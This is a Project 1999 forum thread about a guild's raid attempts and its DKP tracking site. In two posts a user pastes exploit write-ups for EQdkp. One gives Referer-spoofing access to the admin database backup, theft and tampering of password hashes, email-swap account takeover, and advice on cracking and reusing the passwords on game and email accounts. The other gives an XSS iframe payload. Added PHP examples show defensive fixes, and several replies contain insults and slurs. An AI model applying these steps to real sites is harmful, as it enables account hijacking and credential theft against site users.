Project 1999

  #1  
Old 06-26-2012, 03:47 PM
Arzak Arzak is offline
Banned


Join Date: Jun 2012
Posts: 1
We wiped to Cazic for 6 hours on Saturday

Weren't able to kill him, only had 22 players that logged on

And then we spent 5 hours in Air last night

Who's jealous?

http://dkp.swiftglobal.com/viewraid.php?r=234
  #2  
Old 06-26-2012, 04:55 PM
Vile Vile is offline
Planar Protector


Join Date: Nov 2009
Posts: 2,304
Default

heheh
  #3  
Old 06-26-2012, 08:02 PM
456 456 is offline
Orc


Join Date: Apr 2012
Posts: 39
Default

Title: EQdkp <= 1.3.1 Referer Spoof to access to SQL Database
URL: http://www.eqdkp.com
Hook: "Powered by EQdkp"
Author: Eight10
Contact: Eight10@gmail.com
--------------------------------------------------------------------------------------------------------
Background: EQdkp is the largest DKP tracking program utilized largely by the MMORPG community, specifically large use in the World of Warcraft Community among Guild/clan Websites.
--------------------------------------------------------------------------------------------------------
Discussion: A vulnerability exists in all current versions of EQdkp that allows one to spoof their referring URL to gain access to an integrated class-1 MySQL Backup/Restore program which allows one to download and modify sensitive SQL data. The script only checks for authentication via referring URL from the administration control panel. Note some sites have this functionality disabled/not installed. From the EQdkp_USERS.sql file, the username/email and MD5 hashed password can be obtained. From there the password needs to be cracked.

Tested on: 1.3.1 Default install.
1.3.0 Default install.
---------------------------------------------------------------------------------------------------------
Exploit:
Use a referer spoofing program, like quickspoof.

Referring URL - - http://www.sitehere.com/pathtoeqdkp/admin/
Target URL - - http://www.sitehere.com/pathtoeqdkp/admin/backup

From the Control menu go to "Backup MySQL data" and select the appropriate Database*.
Download eqdkp_users.sql from there and MD5 hashes and usernames/emails will be present.
E.g.
VALUES ('1', 'admin', 'ec67739608318602f2dd6bcb141b56bc', 'admin@guildswebsite.com', ......
---------------------------------------------------------------------------------------------------------
Alternative type attack**:
One downloads the EQDKP_users.sql and modifies the administration hash in there to be "5f4dcc3b5aa765d61d8327deb882cf99" == password
One could then restore said Database and login to the EQdkp system as admin.

Alternate type attack 2**:
One downloads the EQDKP_users.sql and modifies the email address to his own. Then one requests a password reset from the "forgot my password" page. Then the reset password is emailed to the new email address.
----------------------------------------------------------------------------------------------------------

Further Discussion: As we know people tend to use the same passwords in multiple places, especially when the topics are related, for instance WoW account information and WoW clan websites. Along with similar passes often used for the email address, which one can retrieve account names from the Blizzard's site.
Note, when cracking, the requirements for WoW passwords, I believe it is at least 8 characters long containing both numbers and letters. These can be difficult hashes to break but when the passwords are weak dictionary words simply followed by numbers, a good amount of success can be achieved. This method is especially good when you already have appropriately generated rainbow tables, or hashes can be sent to online hash crackers.

*Note Other databases can be obtained using this SQL backup tool too! Such as PHPBB databases.
**(Note Sometimes Permission settings prevent SQL restores)

Shout Out:
RichyPoo (Calrich AKA Faglord). Throhg (pwnt). BrowerPower. Bliznat(ty)
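Added example (not part of the post above and not EQdkp code): the Referer-only gate the advisory describes, next to a gate that relies on server-side session state and a CSRF token. The function names, the session keys (`user_id`, `is_admin`, `csrf_token`) and the sample requests are assumptions made for illustration.

```php
<?php
// Added illustration; not EQdkp source. All function and key names are hypothetical.

// Weak gate, as the advisory describes it: trusts the client-supplied Referer header.
function referer_gate(array $server, string $adminUrl): bool
{
    $referer = $server['HTTP_REFERER'] ?? '';
    return strncmp($referer, $adminUrl, strlen($adminUrl)) === 0;
}

// Hardened gate: the decision rests on server-side session state, and the
// state-changing backup/restore action also needs a per-session CSRF token.
function session_gate(array $session, array $post): bool
{
    if (empty($session['user_id']) || empty($session['is_admin'])) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($supplied) && hash_equals($expected, $supplied);
}

$adminUrl = 'http://www.sitehere.com/pathtoeqdkp/admin/';

// Constructed request 1: nobody is logged in, but the Referer header names the admin panel.
$anonServer = ['HTTP_REFERER' => $adminUrl];
printf("referer gate, anonymous request: %s\n",
    var_export(referer_gate($anonServer, $adminUrl), true));
printf("session gate, anonymous request: %s\n",
    var_export(session_gate([], []), true));

// Constructed request 2: a logged-in administrator submitting the form with its token.
$token = bin2hex(random_bytes(16));
$adminSession = ['user_id' => 1, 'is_admin' => true, 'csrf_token' => $token];
printf("session gate, admin with token:  %s\n",
    var_export(session_gate($adminSession, ['csrf_token' => $token]), true));
```

In an application the three arrays would be `$_SERVER`, `$_SESSION` and `$_POST`; the Referer header can at most serve as an extra signal, never as the authorization decision.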
  #4  
Old 06-26-2012, 08:02 PM
456 456 is offline
Orc


Join Date: Apr 2012
Posts: 39
Default

[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){

    $disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
    $disallowed_content = explode('|', $disallowed);
    if (empty($disallowed_content))
    {
        return false;
    }
[/code]

To get around this, you can use the next design:
Code:
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
After downloading the file to the server, you can find the file on request:
http://site.com/dkp/plugins/mediacen...p?mode=ajax&id = [ID].
[ID] - simple exhaustive search.

Example:
http://www.eqdkp-plus.com/demo06/dat...a3825c2494f2/mediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm

Vulnerable versions: <=0.6.4.5
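Added example (not part of the post above and not EQdkp-plus code): why a tag denylist like the quoted `$disallowed` string is a weak control, and two handling patterns that do not depend on enumerating bad tags. How the plugin actually matches the list is not shown in the post, so the substring match here is an assumption, as are all function names and the allowlisted file types.

```php
<?php
// Added illustration; not EQdkp-plus source. Function names are hypothetical.

// Denylist check modelled on the $disallowed string quoted in the post.
// Assumption: each entry is matched as the start of a tag.
function denylist_rejects(string $content): bool
{
    $disallowed = 'body|head|html|img|plaintext|a href|pre|script|table|title|php';
    foreach (explode('|', $disallowed) as $needle) {
        if (stripos($content, '<' . $needle) !== false) {
            return true;
        }
    }
    return false;
}

// Pattern 1: accept uploads only when extension AND sniffed MIME type are allowlisted.
function upload_allowed(string $filename, string $bytes): bool
{
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return false;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    return $mime === $allowed[$ext];
}

// Pattern 2: whenever user-supplied text is echoed into a page, encode it.
function render_as_text(string $content): string
{
    return htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample: markup whose element name is simply absent from the denylist.
$sample = '<iframe src="about:blank" onload="alert(1)"></iframe>';

printf("denylist rejects sample:  %s\n", var_export(denylist_rejects($sample), true));
printf("allowlist accepts upload: %s\n", var_export(upload_allowed('note.htm', $sample), true));
printf("encoded for output:       %s\n", render_as_text($sample));
```

`upload_allowed()` needs PHP's fileinfo extension; stored files should additionally be served with a fixed `Content-Type` and `X-Content-Type-Options: nosniff` so the browser never interprets them as HTML.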
  #6  
Old 06-27-2012, 12:50 AM
jdklaw jdklaw is offline
Banned


Join Date: Aug 2011
Posts: 559
Default

I don't get it
  #7  
Old 06-27-2012, 12:53 AM
Harrison Harrison is offline
Banned


Join Date: Aug 2010
Location: Massachusetts
Posts: 2,320
Default

Who is pathetic enough to obsess over a guild on a server that they no longer play on to the degree of "sleazing" into their vent, DKP, forums, etc.?

You need a life far more than the people enjoying their hobby in a videogame that you got owned on and laughed off of, Salty. (even if they are cheating pieces of shit who should be banned like you are)
  #8  
Old 06-27-2012, 10:10 AM
Tr0llb0rn Tr0llb0rn is offline
Fire Giant


Join Date: May 2012
Posts: 720
Default

Quote:
Originally Posted by Harrison
You need a life far more than the people enjoying their hobby

so true, this is the part that I never got. If I was done playing on the server, I'd sure as hell not lurk around obsessing on it all day. This just shows how bitter and mad they are, they could not beat Nihilum in game, so they try to poison the atmosphere on the forums for.... what? In hopes of a wipe?

lol, never gonna happen. This is project99, not some fly by night shitbox that can wink out in a heartbeat. See you in Kunark and Velious.
  #9  
Old 06-27-2012, 11:31 AM
Nizzarr Nizzarr is offline
Planar Protector


Join Date: Oct 2009
Posts: 1,644
Default

Quote:
Originally Posted by jibekn
see you never. not gonna ever log into p99 red/blue again even if the pop rises
Good fucking riddance
  #10  
Old 06-27-2012, 10:54 PM
Moda Moda is offline
Aviak


Join Date: Mar 2012
Posts: 59
Default

Yeah I don't really see why people care so much about the inner workings of nihilum